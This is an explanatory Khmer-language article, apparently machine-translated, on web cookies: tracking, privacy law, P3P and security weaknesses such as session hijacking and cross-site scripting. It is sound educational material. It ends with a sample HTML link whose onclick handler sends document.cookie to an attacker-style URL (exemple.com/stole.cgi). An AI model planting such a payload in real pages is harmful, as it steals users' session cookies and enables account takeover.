ស្ថានភាពទីបីអនុញ្ញាតឱ្យម៉ាស៊ីនមេ ឬស្គ្រីបលុបខូគីយ៉ាងច្បាស់លាស់។ ចំណាំថាវាអាចទៅរួចជាមួយកម្មវិធីរុករកតាមអ៊ីនធឺណិត Google Chrome ដើម្បីដឹងពីកាលបរិច្ឆេទផុតកំណត់នៃខូគីជាក់លាក់មួយដោយចូលទៅកាន់ការកំណត់មាតិកា។ ខូគីដែលបានរក្សាទុកនៅលើកុំព្យូទ័រអាចនៅតែមាននៅទីនោះអស់រយៈពេលជាច្រើនទសវត្សរ៍ ប្រសិនបើគ្មាននីតិវិធីណាមួយត្រូវបានយកទៅលុបវាចោល។

ស្តេរ៉េអូ

ចាប់តាំងពីការណែនាំរបស់ពួកគេនៅលើអ៊ីនធឺណិត គំនិតជាច្រើនអំពីខូឃីបានផ្សព្វផ្សាយនៅលើអ៊ីនធឺណិត និងនៅក្នុងប្រព័ន្ធផ្សព្វផ្សាយ។ នៅឆ្នាំ 1998 CIAC ដែលជាក្រុមត្រួតពិនិត្យឧប្បត្តិហេតុកុំព្យូទ័ររបស់ក្រសួងថាមពលសហរដ្ឋអាមេរិកបានកំណត់ថាភាពងាយរងគ្រោះផ្នែកសុវត្ថិភាពខូគីគឺ "មិនមាន" ហើយបានពន្យល់ថា "ព័ត៌មានអំពីប្រភពដើមនៃការចូលមើលរបស់អ្នក និងព័ត៌មានលម្អិតនៃគេហទំព័រដែលអ្នកបានចូលមើល។ មានរួចហើយនៅក្នុងឯកសារកំណត់ហេតុនៃម៉ាស៊ីនមេបណ្តាញ”។ ក្នុងឆ្នាំ 2005 ការស្រាវជ្រាវ Jupiter បានបោះពុម្ពផ្សាយលទ្ធផលនៃការសិក្សាមួយដែលក្នុងនោះភាគរយសំខាន់នៃអ្នកឆ្លើយតបបានពិចារណាលើសេចក្តីថ្លែងការណ៍ដូចខាងក្រោម:

• ខូគីគឺដូចជា មេរោគពួកវាឆ្លងទៅលើ hard drive របស់អ្នកប្រើប្រាស់។
• ខូគីបង្កើត ផុស​ឡើង.
• ខូឃីត្រូវបានប្រើដើម្បីផ្ញើ សារឥតបានការ.
• ខូឃីត្រូវបានប្រើសម្រាប់តែការផ្សាយពាណិជ្ជកម្មប៉ុណ្ណោះ។

ខូគីមិនអាចលុប ឬអានព័ត៌មានពីកុំព្យូទ័ររបស់អ្នកប្រើបានទេ។ ទោះជាយ៉ាងណាក៏ដោយ ខូគីធ្វើឱ្យវាអាចរកឃើញទំព័របណ្តាញដែលបានចូលមើលដោយអ្នកប្រើប្រាស់នៅលើគេហទំព័រដែលបានផ្តល់ឱ្យ ឬសំណុំនៃគេហទំព័រ។ ព័ត៌មាននេះអាចត្រូវបានប្រមូលនៅក្នុងកម្រងព័ត៌មានអ្នកប្រើប្រាស់ដែលអាចប្រើ ឬលក់បន្តទៅឱ្យភាគីទីបី ដែលអាចបង្កបញ្ហាឯកជនភាពធ្ងន់ធ្ងរ។ កម្រង​ព័ត៌មាន​ខ្លះ​មិន​បញ្ចេញ​ឈ្មោះ ក្នុង​ន័យ​ថា​វា​គ្មាន​ព័ត៌មាន​ផ្ទាល់​ខ្លួន សូម្បី​តែ​ទម្រង់​បែប​នេះ​ក៏​អាច​ចោទ​ជា​សំណួរ​បាន​ដែរ។

យោងតាមការសិក្សាដដែលនេះ អ្នកប្រើប្រាស់អ៊ីនធឺណែតមួយភាគធំមិនដឹងពីរបៀបលុបខូឃីទេ។ ហេតុផលមួយក្នុងចំណោមហេតុផលដែលមនុស្សមិនទុកចិត្តខូគី គឺដោយសារតែគេហទំព័រមួយចំនួនបានបំពានលើទិដ្ឋភាពកំណត់អត្តសញ្ញាណផ្ទាល់ខ្លួនរបស់ខូគី និងចែករំលែកព័ត៌មាននេះជាមួយប្រភពផ្សេងទៀត។ ភាគរយដ៏ធំនៃការផ្សាយពាណិជ្ជកម្មដែលមានគោលដៅ និងអ៊ីមែលដែលមិនមានការស្នើសុំ ដែលត្រូវបានគេចាត់ទុកថាជាសារឥតបានការ មកពីព័ត៌មានដែលប្រមូលបានពីការតាមដានខូគី។

ការកំណត់កម្មវិធីរុករក

កម្មវិធីរុករកតាមអ៊ីនធឺណិតភាគច្រើនគាំទ្រខូគី និងអនុញ្ញាតឱ្យអ្នកប្រើបិទពួកវា។ ជម្រើសទូទៅបំផុតគឺ៖

• បើក ឬបិទខូឃីទាំងស្រុង ដើម្បីឱ្យពួកវាត្រូវបានទទួលយក ឬរារាំងជានិច្ច។
• អនុញ្ញាតឱ្យអ្នកប្រើប្រាស់មើលឃើញខូគីសកម្មនៅក្នុងទំព័រដែលបានផ្តល់ឱ្យដោយបញ្ចូល javascript: alert(document.cookie) នៅក្នុងរបារអាសយដ្ឋាននៃកម្មវិធីរុករក។ កម្មវិធីរុករកតាមអ៊ីនធឺណិតមួយចំនួនរួមបញ្ចូលកម្មវិធីគ្រប់គ្រងខូគីសម្រាប់អ្នកប្រើប្រាស់ដែលអាចមើល និងជ្រើសរើសលុបខូគីដែលផ្ទុកដោយកម្មវិធីរុករកតាមអ៊ីនធឺណិត។

កម្មវិធីរុករកតាមអ៊ីនធឺណិតភាគច្រើនក៏អនុញ្ញាតឱ្យលុបទិន្នន័យផ្ទាល់ខ្លួនទាំងស្រុង ដែលរួមបញ្ចូលខូឃីផងដែរ។ ម៉ូឌុលបន្ថែមដើម្បីគ្រប់គ្រងការអនុញ្ញាតខូគីក៏មានផងដែរ។

ឯកជនភាព និងខូគីភាគីទីបី

នៅក្នុងឧទាហរណ៍ប្រឌិតនេះ ក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្មមួយបានដាក់បដានៅលើគេហទំព័រចំនួនពីរ។ តាមរយៈការបង្ហោះបដានៅលើម៉ាស៊ីនមេរបស់ខ្លួន និងប្រើប្រាស់ខូគីភាគីទីបី ក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្មអាចតាមដានការរុករករបស់អ្នកប្រើប្រាស់តាមរយៈគេហទំព័រទាំងពីរនេះ។

ខូគីមានផលប៉ះពាល់យ៉ាងសំខាន់ចំពោះភាពឯកជន និងអនាមិករបស់អ្នកប្រើប្រាស់គេហទំព័រ។ ទោះបីជាខូឃីត្រូវបានផ្ញើត្រឡប់ទៅម៉ាស៊ីនមេដែលកំណត់ពួកវា ឬទៅម៉ាស៊ីនមេដែលជាកម្មសិទ្ធិរបស់ដែនអ៊ីនធឺណែតដូចគ្នាក៏ដោយ ក៏ទំព័របណ្តាញអាចមានរូបភាព ឬសមាសធាតុផ្សេងទៀតដែលរក្សាទុកនៅលើម៉ាស៊ីនមេដែលជាកម្មសិទ្ធិរបស់ដែនផ្សេងទៀត។ ខូគីដែលត្រូវបានកំណត់កំឡុងពេលការងើបឡើងវិញនៃសមាសធាតុខាងក្រៅទាំងនេះត្រូវបានហៅ ខូគីភាគីទីបី. នេះរួមបញ្ចូលខូគីពីបង្អួចលេចឡើងដែលមិនចង់បាន។

ក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្មប្រើខូគីភាគីទីបីដើម្បីតាមដានអ្នកប្រើប្រាស់នៅទូទាំងគេហទំព័រផ្សេងៗគ្នាដែលពួកគេចូលមើល។ ជាពិសេស ក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្មអាចតាមដានអ្នកប្រើប្រាស់នៅគ្រប់ទំព័រទាំងអស់ ដែលវាបានដាក់រូបភាពផ្សាយពាណិជ្ជកម្ម ឬភីកសែលតាមដាន។ ចំនេះដឹងនៃទំព័រដែលបានចូលមើលដោយអ្នកប្រើប្រាស់អនុញ្ញាតឱ្យក្រុមហ៊ុនផ្សាយពាណិជ្ជកម្មកំណត់គោលដៅចំណូលចិត្តការផ្សាយពាណិជ្ជកម្មរបស់អ្នកប្រើប្រាស់។

សមត្ថភាពក្នុងការបង្កើតកម្រងព័ត៌មានអ្នកប្រើប្រាស់ត្រូវបានចាត់ទុកដោយអ្នកខ្លះថាជាការលុកលុយឯកជនភាព ជាពិសេសនៅពេលដែលការតាមដានត្រូវបានធ្វើនៅទូទាំងដែនផ្សេងៗគ្នាដោយប្រើខូគីភាគីទីបី។ សម្រាប់ហេតុផលនេះ ប្រទេសមួយចំនួនមានច្បាប់ខូគី។

រដ្ឋាភិបាលសហរដ្ឋអាមេរិកបានអនុវត្តច្បាប់តឹងរ៉ឹងលើការដាក់ខូឃីក្នុងឆ្នាំ 2000 បន្ទាប់ពីវាត្រូវបានគេបង្ហាញថាការិយាល័យគោលនយោបាយឱសថសេតវិមានកំពុងប្រើប្រាស់ខូឃីដើម្បីតាមដានកុំព្យូទ័ររបស់អ្នកប្រើប្រាស់ដែលមើលការផ្សាយពាណិជ្ជកម្មឱសថតាមអ៊ីនធឺណិត។ ក្នុងឆ្នាំ 2002 សកម្មជនឯកជនភាព Daniel Brandt បានរកឃើញថា CIA បានទុក cookies ជាប់លាប់នៅលើកុំព្យូទ័រដែលបានចូលមើលគេហទំព័ររបស់ខ្លួន។ នៅពេលដែលបានជូនដំណឹងអំពីការរំលោភនេះ CIA បានប្រកាសថាខូគីទាំងនេះមិនត្រូវបានផ្ញើដោយចេតនា និងបញ្ឈប់ការកំណត់ពួកវាទេ។ នៅថ្ងៃទី 25 ខែធ្នូ ឆ្នាំ 2005 Brandt បានរកឃើញថា ទីភ្នាក់ងារសន្តិសុខជាតិ (NSA) បានទុកខូឃីជាប់លាប់ចំនួនពីរនៅលើកុំព្យូទ័ររបស់អ្នកទស្សនា ដោយសារតែការអាប់ដេតកម្មវិធី។ បន្ទាប់ពីត្រូវបានជូនដំណឹង NSA បានបិទខូឃីភ្លាមៗ។

នៅចក្រភពអង់គ្លេស អេ ច្បាប់ខូគី “ ចូលជាធរមាននៅថ្ងៃទី 25 ខែឧសភា ឆ្នាំ 2012 តម្រូវឱ្យគេហទំព័រប្រកាសពីចេតនារបស់ពួកគេ ដូច្នេះអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់ជ្រើសរើសថាតើពួកគេចង់ចាកចេញពីដាន ឬមិនឆ្លងកាត់តាមអ៊ីនធឺណិត។ ដូច្នេះពួកគេអាចការពារពីការកំណត់គោលដៅផ្សាយពាណិជ្ជកម្ម។ ទោះយ៉ាងណាក៏ដោយ យោង​ទៅ​តាម Guardian បានការយល់ព្រមពីអ្នកប្រើប្រាស់អ៊ីនធឺណែតគឺមិនចាំបាច់ច្បាស់លាស់ទេ។ ការផ្លាស់ប្តូរត្រូវបានធ្វើឡើងចំពោះលក្ខខណ្ឌនៃការយល់ព្រមពីអ្នកប្រើប្រាស់ បញ្ជាក់ដូច្នេះ.

សេចក្តីណែនាំ ២០០២/៥៨ ស្តីពីភាពឯកជន

សេចក្តីណែនាំ 202/58 ឯកជនភាព និងទំនាក់ទំនងអេឡិចត្រូនិច មានច្បាប់ស្តីពីការប្រើប្រាស់ខូគី។ ជាពិសេស មាត្រា 5 កថាខណ្ឌទី 3 នៃការណែនាំនេះតម្រូវឱ្យការផ្ទុកទិន្នន័យ (ដូចជាខូគី) នៅក្នុងកុំព្យូទ័ររបស់អ្នកប្រើអាចធ្វើបានលុះត្រាតែ៖

• អ្នកប្រើប្រាស់ត្រូវបានជូនដំណឹងអំពីរបៀបដែលទិន្នន័យត្រូវបានប្រើប្រាស់។
• អ្នកប្រើប្រាស់ត្រូវបានផ្តល់ជម្រើសក្នុងការបដិសេធប្រតិបត្តិការផ្ទុកនេះ។ ទោះជាយ៉ាងណាក៏ដោយ អត្ថបទនេះក៏ចែងផងដែរថាការផ្ទុកទិន្នន័យសម្រាប់ហេតុផលបច្ចេកទេសត្រូវបានលើកលែងពីច្បាប់នេះ។

ដោយសារតែត្រូវអនុវត្តចាប់ពីខែតុលា ឆ្នាំ 2003 ការណែនាំនេះត្រូវបានគេដាក់ឱ្យអនុវត្តយ៉ាងមិនល្អឥតខ្ចោះ យោងទៅតាមរបាយការណ៍នៃខែធ្នូ ឆ្នាំ 2004 ដែលបានចង្អុលបង្ហាញផងដែរថារដ្ឋសមាជិកមួយចំនួន (ស្លូវ៉ាគី ឡាតវី ក្រិក បែលហ្សិក និងលុចសំបួ) មិនទាន់បានផ្លាស់ប្តូរច្បាប់នោះទេ។ ការណែនាំទៅក្នុងច្បាប់ក្នុងស្រុក។

យោងតាមគំនិតរបស់ G29 ក្នុងឆ្នាំ 2010 ការណែនាំនេះដែលកំណត់យ៉ាងសំខាន់ចំពោះការប្រើប្រាស់ខូឃីសម្រាប់គោលបំណងផ្សាយពាណិជ្ជកម្មតាមអាកប្បកិរិយា ការយល់ព្រមច្បាស់លាស់ពីអ្នកប្រើប្រាស់អ៊ីនធឺណិតនៅតែត្រូវបានអនុវត្តយ៉ាងលំបាក។ ជាការពិត គេហទំព័រភាគច្រើនធ្វើដូច្នេះក្នុងវិធីមួយដែលមិនអនុលោមតាមការណែនាំ ដោយកំណត់ខ្លួនពួកគេទៅនឹង "បដា" សាមញ្ញជូនដំណឹងអំពីការប្រើប្រាស់ "ខូគី" ដោយមិនផ្តល់ព័ត៌មានអំពីការប្រើប្រាស់ ដោយមិនបែងចែករវាងខូគី "បច្ចេកទេស" ទេ។ ខូគី "តាមដាន" ហើយក៏មិនផ្តល់ជម្រើសពិតប្រាកដដល់អ្នកប្រើប្រាស់ដែលចង់រក្សាខូគីបច្ចេកទេស (ដូចជាខូគីគ្រប់គ្រងរទេះទិញទំនិញ) និងបដិសេធខូគី "តាមដាន" ជាការពិត គេហទំព័រជាច្រើនមិនដំណើរការត្រឹមត្រូវទេ ប្រសិនបើខូគីត្រូវបានបដិសេធ ដែលមិនគោរពតាមការណែនាំ 2002/58 ឬការណែនាំ 95/46 (ការការពារទិន្នន័យផ្ទាល់ខ្លួន)។

សេចក្តីបង្គាប់ ៩៦/៦០/គ.ស

សម្ភារៈនេះត្រូវបានធ្វើបច្ចុប្បន្នភាពដោយ Directive 2009/136/EC ចុះថ្ងៃទី 25 ខែវិច្ឆិកា ឆ្នាំ 2009 ដែលចែងថា "ការរក្សាទុកព័ត៌មាន ឬការទទួលបានព័ត៌មានដែលបានរក្សាទុករួចហើយ នៅក្នុងឧបករណ៍ស្ថានីយរបស់អ្នកជាវ ឬអ្នកប្រើប្រាស់ត្រូវបានអនុញ្ញាតតែក្នុងលក្ខខណ្ឌដែល អតិថិជន ឬអ្នកប្រើប្រាស់បានផ្តល់ការយល់ព្រមរបស់គាត់ បន្ទាប់ពីបានទទួល នៅក្នុងការអនុលោមតាមសេចក្តីបង្គាប់ 95/46/EC នូវព័ត៌មានច្បាស់លាស់ និងពេញលេញរវាងអ្នកផ្សេងទៀតអំពីគោលបំណងនៃដំណើរការ”។ ដូច្នេះ សេចក្តីណែនាំថ្មីនេះ ពង្រឹងកាតព្វកិច្ច មុននឹងដាក់ខូឃីនៅលើកុំព្យូទ័ររបស់អ្នកប្រើប្រាស់អ៊ីនធឺណិត។

នៅក្នុងការពិចារណាបឋមនៃសារាចរណែនាំនេះ សមាជិកសភាអឺរ៉ុបបញ្ជាក់យ៉ាងដូច្នេះថា "កន្លែងណាដែលអាចធ្វើទៅបានតាមលក្ខណៈបច្ចេកទេស និងមានប្រសិទ្ធភាព អនុលោមតាមបទប្បញ្ញត្តិពាក់ព័ន្ធនៃសេចក្តីបង្គាប់ 95/46/EC ការយល់ព្រមរបស់អ្នកប្រើប្រាស់ទាក់ទងនឹងដំណើរការអាចត្រូវបានបង្ហាញតាមរយៈ ការប្រើប្រាស់ការកំណត់សមស្របនៃកម្មវិធីរុករកតាមអ៊ីនធឺណិត ឬកម្មវិធីផ្សេងទៀត”។ ប៉ុន្តែតាមពិតទៅ គ្មានកម្មវិធីរុករកណាដែលធ្វើឱ្យវាអាចផ្តាច់ខូគីបច្ចេកទេសសំខាន់ៗចេញពីជម្រើសដែលគួរទុកជាជម្រើសរបស់អ្នកប្រើ។

ការណែនាំថ្មីនេះត្រូវបានផ្លាស់ប្តូរដោយសមាជិកសភាបែលហ្ស៊ិកក្នុងខែកក្កដាឆ្នាំ 2012។ ការសិក្សាឆ្នាំ 2014 បង្ហាញថាសូម្បីតែសមាជិកសភាក៏ពិបាកក្នុងការអនុវត្ត ឧបសគ្គនៃការណែនាំ.

P3P

ការបញ្ជាក់ P3P រួមមានសមត្ថភាពសម្រាប់ម៉ាស៊ីនមេដើម្បីបញ្ជាក់គោលការណ៍ឯកជនភាព ដែលកំណត់ប្រភេទព័ត៌មានដែលវាប្រមូល និងសម្រាប់គោលបំណងអ្វី។ គោលការណ៍ទាំងនេះរួមបញ្ចូល (ប៉ុន្តែមិនកំណត់ចំពោះ) ការប្រើប្រាស់ព័ត៌មានដែលប្រមូលបានដោយប្រើខូគី។ យោងតាមនិយមន័យនៃ P3P កម្មវិធីរុករកអាចទទួលយក ឬបដិសេធខូគីដោយប្រៀបធៀបគោលការណ៍ឯកជនភាពជាមួយនឹងចំណូលចិត្តរបស់អ្នកប្រើ ឬដោយការសួរអ្នកប្រើប្រាស់ បង្ហាញសេចក្តីថ្លែងការអំពីគោលការណ៍ឯកជនភាពដែលបានប្រកាសដោយម៉ាស៊ីនមេ។

កម្មវិធីរុករកតាមអ៊ីនធឺណិតជាច្រើន រួមទាំង Apple Safari និង Microsoft Internet Explorer កំណែ 6 និង 7 គាំទ្រ P3P ដែលអនុញ្ញាតឱ្យកម្មវិធីរុករកតាមអ៊ីនធឺណិតកំណត់ថាតើត្រូវទទួលយកការផ្ទុកខូគីភាគីទីបីដែរឬទេ។ កម្មវិធីរុករកតាមអ៊ីនធឺណិត Opera អនុញ្ញាតឱ្យអ្នកប្រើបដិសេធខូគីភាគីទីបី និងបង្កើតទម្រង់សុវត្ថិភាពសកល និងជាក់លាក់សម្រាប់ដែនអ៊ីនធឺណិត។ Mozilla Firefox កំណែ 2 បានទម្លាក់ការគាំទ្រ P3P ប៉ុន្តែបានបញ្ចូលវាឡើងវិញនៅក្នុងកំណែ 3 ។

ខូគីភាគីទីបីអាចត្រូវបានរារាំងដោយកម្មវិធីរុករកតាមអ៊ីនធឺណិតភាគច្រើន ដើម្បីបង្កើនភាពឯកជន និងកាត់បន្ថយការតាមដានការផ្សាយពាណិជ្ជកម្ម ដោយមិនប៉ះពាល់អវិជ្ជមានដល់បទពិសោធន៍គេហទំព័ររបស់អ្នកប្រើប្រាស់ឡើយ។ ភ្នាក់ងារផ្សាយពាណិជ្ជកម្មជាច្រើនផ្តល់ជម្រើសមួយ។ ជ្រើស​យកចេញ ចំពោះការផ្សាយពាណិជ្ជកម្មដែលបានកំណត់គោលដៅ ដោយរៀបចំខូគីទូទៅនៅក្នុងកម្មវិធីរុករកតាមអ៊ីនធឺណិតដែលបិទដំណើរការការកំណត់គោលដៅនេះ ប៉ុន្តែដំណោះស្រាយបែបនេះមិនមានប្រសិទ្ធភាពនោះទេ នៅពេលដែលវាត្រូវបានគោរព ពីព្រោះខូគីទូទៅនេះត្រូវបានលុបភ្លាមៗនៅពេលដែលអ្នកប្រើប្រាស់លុបខូគីទាំងនេះ ដែលលុបចោលជម្រើស ការសម្រេចចិត្តចេញ។

គុណវិបត្តិនៃខូឃី

បន្ថែមពីលើបញ្ហាឯកជនភាព ខូគីក៏មានគុណវិបត្តិបច្ចេកទេសមួយចំនួនផងដែរ។ ជាពិសេស ពួកគេមិនតែងតែកំណត់អត្តសញ្ញាណអ្នកប្រើប្រាស់បានត្រឹមត្រូវនោះទេ ពួកគេអាចបន្ថយល្បឿនដំណើរការគេហទំព័រ នៅពេលដែលមានចំនួនច្រើន ពួកគេអាចប្រើសម្រាប់ការវាយប្រហារផ្នែកសុវត្ថិភាព ហើយពួកគេប៉ះទង្គិចជាមួយនឹងការផ្ទេររដ្ឋតំណាង រចនាប័ទ្មស្ថាបត្យកម្មនៃកម្មវិធី។

ការកំណត់អត្តសញ្ញាណមិនច្បាស់លាស់

ប្រសិនបើកម្មវិធីរុករកច្រើនជាងមួយត្រូវបានប្រើប្រាស់នៅលើកុំព្យូទ័រ នោះនៅក្នុងពួកវានីមួយៗតែងតែមានឯកតាផ្ទុកដាច់ដោយឡែកសម្រាប់ខូគី។ ដូច្នេះ ខូគីមិនកំណត់អត្តសញ្ញាណបុគ្គលនោះទេ ប៉ុន្តែការរួមបញ្ចូលគ្នានៃគណនីអ្នកប្រើប្រាស់ កុំព្យូទ័រ និងកម្មវិធីរុករកតាមអ៊ីនធឺណិត។ ដូច្នេះ អ្នកណាម្នាក់អាចប្រើប្រាស់គណនី កុំព្យូទ័រ ឬកម្មវិធីរុករកតាមអ៊ីនធឺណិតដែលមានខូគី។ ដូចគ្នាដែរ ខូគីមិនបែងចែករវាងអ្នកប្រើប្រាស់ច្រើននាក់ ដែលចែករំលែកគណនីអ្នកប្រើប្រាស់ដូចគ្នា កុំព្យូទ័រ និងកម្មវិធីរុករកតាមអ៊ីនធឺណិត ដូចជានៅក្នុង "ហាងកាហ្វេអ៊ីនធឺណិត" ឬកន្លែងណាមួយដែលផ្តល់សិទ្ធិចូលប្រើធនធានកុំព្យូទ័រដោយឥតគិតថ្លៃ។

ប៉ុន្តែនៅក្នុងការអនុវត្តជាក់ស្តែង សេចក្តីថ្លែងការណ៍នេះប្រែទៅជាខុសនៅក្នុងករណីភាគច្រើន ដោយសារតែសព្វថ្ងៃនេះ កុំព្យូទ័រ "ផ្ទាល់ខ្លួន" (ឬស្មាតហ្វូន ឬថេប្លេត ដែលអាក្រក់ជាងនេះ) ត្រូវបានប្រើប្រាស់ជាចម្បងដោយបុគ្គលតែមួយ។ នេះស្មើនឹងការកំណត់គោលដៅបុគ្គលជាក់លាក់ និង តាមរយៈបរិមាណនៃព័ត៌មានដែលប្រមូលបានមកដល់គោលដៅផ្ទាល់ខ្លួន បើទោះបីជាបុគ្គលនោះមិនត្រូវបានកំណត់អត្តសញ្ញាណ "ឈ្មោះ" ក៏ដោយ។

ការលួចខូឃី

ខូគីអាចត្រូវបានលួចដោយកុំព្យូទ័រផ្សេងទៀតនៅលើបណ្តាញ។

ក្នុងអំឡុងពេលប្រតិបត្តិការធម្មតា ខូគីត្រូវបានបញ្ជូនមកវិញរវាងម៉ាស៊ីនមេ (ឬក្រុមនៃម៉ាស៊ីនមេនៅក្នុងដែនដូចគ្នា) និងកម្មវិធីរុករកកុំព្យូទ័ររបស់អ្នកប្រើ។ ដោយសារខូគីអាចមានព័ត៌មានរសើប (ឈ្មោះអ្នកប្រើប្រាស់ ពាក្យសម្ងាត់ដែលប្រើសម្រាប់ការផ្ទៀងផ្ទាត់។ ការលួចខូគីគឺជាសកម្មភាពនៃការស្ទាក់ចាប់ខូឃីដោយភាគីទីបីដែលគ្មានការអនុញ្ញាត។

ខូឃីអាចត្រូវបានគេលួចតាមរយៈ packet sniffer នៅក្នុងការវាយប្រហារដែលហៅថា session hijacking។ ចរាចរណ៍នៅលើបណ្តាញអាចត្រូវបានស្ទាក់ចាប់ និងអានដោយកុំព្យូទ័រក្រៅពីការផ្ញើ និងទទួល (ជាពិសេសនៅលើកន្លែង Wi-Fi សាធារណៈដែលមិនបានអ៊ិនគ្រីប)។ ចរាចរណ៍នេះរួមបញ្ចូលខូគីដែលបានផ្ញើតាមវគ្គដោយប្រើពិធីការ HTTP ធម្មតា។ នៅពេលដែលចរាចរណ៍បណ្តាញមិនត្រូវបានអ៊ិនគ្រីប អ្នកប្រើប្រាស់ដែលមានគំនិតអាក្រក់អាចអានទំនាក់ទំនងរបស់អ្នកប្រើប្រាស់ផ្សេងទៀតនៅលើបណ្តាញដោយប្រើ "packet sniffers"។

បញ្ហានេះអាចត្រូវបានយកឈ្នះដោយការអ៊ិនគ្រីបការតភ្ជាប់រវាងកុំព្យូទ័ររបស់អ្នកប្រើ និងម៉ាស៊ីនមេដោយប្រើពិធីការ HTTPS ។ ម៉ាស៊ីនមេអាចបញ្ជាក់ a ទង់សុវត្ថិភាព ពេលកំណត់ខូគី; កម្មវិធីរុករកនឹងបញ្ជូនវាតាមខ្សែសុវត្ថិភាព ដូចជាការភ្ជាប់ SSL ជាដើម។

ទោះបីជាយ៉ាងណាក៏ដោយ គេហទំព័រជាច្រើន ទោះបីជាប្រើប្រាស់ទំនាក់ទំនងដែលបានអ៊ិនគ្រីប HTTPS សម្រាប់ការផ្ទៀងផ្ទាត់អ្នកប្រើប្រាស់ (ឧ. ទំព័រចូល) ក្រោយមកផ្ញើខូគីសម័យ និងទិន្នន័យផ្សេងទៀតដូចធម្មតា តាមរយៈការតភ្ជាប់ HTTP ដែលមិនបានអ៊ិនគ្រីបសម្រាប់ហេតុផលប្រសិទ្ធភាព។ ដូច្នេះ អ្នកវាយប្រហារអាចស្ទាក់ចាប់ cookie របស់អ្នកប្រើប្រាស់ផ្សេងទៀត ហើយក្លែងបន្លំវានៅលើគេហទំព័រសមស្រប ឬប្រើពួកវាក្នុងការវាយប្រហារខូគី។

ការសរសេរស្គ្រីបនៅក្នុងគេហទំព័រ៖ ខូគីដែលគួរត្រូវបានផ្លាស់ប្តូរតែរវាងម៉ាស៊ីនមេ និងម៉ាស៊ីនភ្ញៀវប៉ុណ្ណោះត្រូវបានបញ្ជូនទៅភាគីទីបីផ្សេងទៀត។

វិធីមួយទៀតដើម្បីលួច cookies គឺដើម្បីស្គ្រីបគេហទំព័រ ហើយឱ្យ browser ខ្លួនវាផ្ញើ cookies ទៅ servers ព្យាបាទដែលមិនដែលទទួលបានវា។ កម្មវិធីរុករកតាមអ៊ីនធឺណិតទំនើបអនុញ្ញាតឱ្យប្រតិបត្តិផ្នែកដែលស្វែងរកបន្ទាប់ពីកូដពីម៉ាស៊ីនមេ។ ប្រសិនបើខូគីត្រូវបានចូលប្រើក្នុងអំឡុងពេលដំណើរការ តម្លៃរបស់ពួកគេអាចត្រូវបានទំនាក់ទំនងក្នុងទម្រង់មួយចំនួនទៅកាន់ម៉ាស៊ីនមេដែលមិនគួរចូលប្រើពួកវា។ ការអ៊ិនគ្រីបខូគីមុនពេលពួកវាត្រូវបានផ្ញើតាមបណ្តាញមិនជួយរារាំងការវាយប្រហារនោះទេ។

ប្រភេទនៃការសរសេរស្គ្រីបក្នុងគេហទំព័រនេះជាធម្មតាត្រូវបានប្រើប្រាស់ដោយអ្នកវាយប្រហារនៅលើគេហទំព័រដែលអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់បង្ហោះមាតិកា HTML ។ ដោយការរួមបញ្ចូលផ្នែកមួយនៃកូដដែលត្រូវគ្នានៅក្នុងការរួមចំណែក HTML អ្នកវាយប្រហារអាចទទួលបានខូគីពីអ្នកប្រើប្រាស់ផ្សេងទៀត។ ចំណេះដឹងអំពីខូគីទាំងនេះអាចត្រូវបានប្រើដោយភ្ជាប់ទៅគេហទំព័រដូចគ្នាដោយប្រើខូគីដែលត្រូវបានលួច ដូច្នេះត្រូវបានទទួលស្គាល់ថាជាអ្នកប្រើប្រាស់ដែលខូគីត្រូវបានលួច។

វិធីមួយដើម្បីការពារការវាយប្រហារបែបនេះគឺត្រូវប្រើទង់ HttpOnly ។ វាគឺជាជម្រើសមួយ ដែលណែនាំតាំងពីកំណែ 6 នៃ Internet Explorer ក្នុង PHP ចាប់តាំងពីកំណែ 5.2.0 ដែលត្រូវបានគ្រោងទុកដើម្បីធ្វើឱ្យខូគីមិនអាចចូលប្រើបានសម្រាប់អតិថិជននៅជិតស្គ្រីប។ ទោះជាយ៉ាងណាក៏ដោយ អ្នកបង្កើតគេហទំព័រគួរតែយកវាទៅក្នុងគណនីអភិវឌ្ឍន៍គេហទំព័ររបស់ពួកគេ ដើម្បីអោយពួកគេមានភាពស៊ាំនឹងការសរសេរស្គ្រីបនៅក្នុងគេហទំព័រ។

ការគំរាមកំហែងផ្នែកសុវត្ថិភាពមួយផ្សេងទៀតដែលត្រូវបានប្រើប្រាស់គឺការប្រឌិតតម្រូវការនៅក្នុងគេហទំព័រ។

លក្ខណៈបច្ចេកទេសផ្លូវការអនុញ្ញាតឱ្យខូគីត្រូវបានផ្ញើត្រឡប់ទៅតែម៉ាស៊ីនមេនៅក្នុងដែនដែលពួកវាមានប្រភពដើមប៉ុណ្ណោះ។ ទោះយ៉ាងណាក៏ដោយ តម្លៃនៃខូគីអាចត្រូវបានផ្ញើទៅកាន់ម៉ាស៊ីនមេផ្សេងទៀតដោយប្រើមធ្យោបាយផ្សេងក្រៅពីបឋមកថាខូគី។

ជាពិសេស ភាសាស្គ្រីបដូចជា JavaScript ជាទូទៅត្រូវបានអនុញ្ញាតឱ្យចូលប្រើតម្លៃខូគី និងមានសមត្ថភាពបញ្ជូនតម្លៃតាមអំពើចិត្តទៅកាន់ម៉ាស៊ីនមេណាមួយនៅលើអ៊ីនធឺណិត។ សមត្ថភាពស្គ្រីបនេះត្រូវបានប្រើពីគេហទំព័រដែលអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់បង្ហោះមាតិកា HTML សម្រាប់អ្នកប្រើប្រាស់ផ្សេងទៀតមើល។

ឧទាហរណ៍ អ្នកវាយប្រហារដែលកំពុងប្រតិបត្តិការលើដែន example.com អាចនឹងបង្ហោះមតិយោបល់ដែលមានតំណភ្ជាប់ខាងក្រោមដែលចង្អុលទៅប្លុកដ៏ពេញនិយមដែលពួកគេមិនគ្រប់គ្រង៖

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

